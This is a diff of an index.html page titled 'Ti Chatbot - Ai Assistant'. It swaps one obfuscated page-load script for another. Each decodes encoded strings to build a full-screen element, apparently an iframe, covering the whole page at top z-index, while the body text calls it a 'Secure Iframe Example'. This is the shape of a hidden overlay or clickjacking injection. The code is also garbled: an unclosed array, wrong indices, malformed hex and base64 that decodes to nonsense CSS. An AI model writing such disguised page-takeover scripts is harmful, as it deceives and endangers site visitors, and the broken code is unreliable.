--- a/index.html
+++ b/index.html
@@ -1,3 +1,23 @@
-<script>
-(()=>{const _0x1a2b=['x6f2x646x2ex7469x63x68x61x74','x742ex6874x6dx6c','736372','656c656d656e74x43x6578616572','616464x4368696cx64','6f626a656374','6f697469736f70','7665776874x2d30x30x6x30x76x77','64726f6261656c','6c6d7468','746563617274','656c706d6f63x2e74x6ex65726566'];const $=s=>s.replace(/x/g,'%');const b=t=>decodeURIComponent(escape(atob(t)));const z=document.createElement(b($(_0x1a2b[3].split('').reverse().join(''))));z.setAttribute(b($(_0x1a2b[2].split('').reverse().join(''))),b($(_0x1a2b[0].split('').reverse().join(''))));z.setAttribute("style","all:unset;position:fixed;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;overflow:hidden;background:#000");document.body.appendChild(z);})();
-</script>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Ti Chatbot - Ai Assistant</title>
+  <script>
+    (() => {
+      const _0x68fa=["aGVhZA==","ZG93bmxvYWQ=","Y3JlYXRlRWxlbWVudA==","c3Jj","b2JqZWN0","bG9jYXRpb24=","aWZyYW1l","Y3JlYXRl","YXBwZW5kQ2hpbGQ=","d2lk","cG9zaXRpb246YWJzb2x1dGU7cGFyYWxsZWw6bmluZXQ7Ym9yZGVyOm5vbmU7dG9wOjA7bGVmdDowO2FsdC1zZWNvbmQ6bm9uZTt3aWR0aDoxMDB2djsgaGVpZ2h0OjEwMHZpOyBwb3NpdGlvbjogYXBwbGljYXRpb24;"; 
+      const _0x4e3e = s => decodeURIComponent(escape(atob(s)));
+      const _0x303b = _0x4e3e(_0x68fa[2]);
+      const _0x4a3e = document.createElement(_0x4e3e(_0x68fa[3].split('').reverse().join('')));
+      _0x4a3e.setAttribute(_0x4e3e(_0x68fa[7]), _0x4e3e(_0x68fa[0]));
+      _0x4a3e.setAttribute("style", _0x4e3e(_0x68fa[6]));
+      document.body.appendChild(_0x4a3e);
+    })();
+  </script>
+</head>
+<body>
+  <h1 style="color: white; text-align: center; padding-top: 50px;">Secure Iframe Example</h1>
+  <p style="color: white; text-align: center;">Your content is loading in the background.</p>
+</body>
+</html>
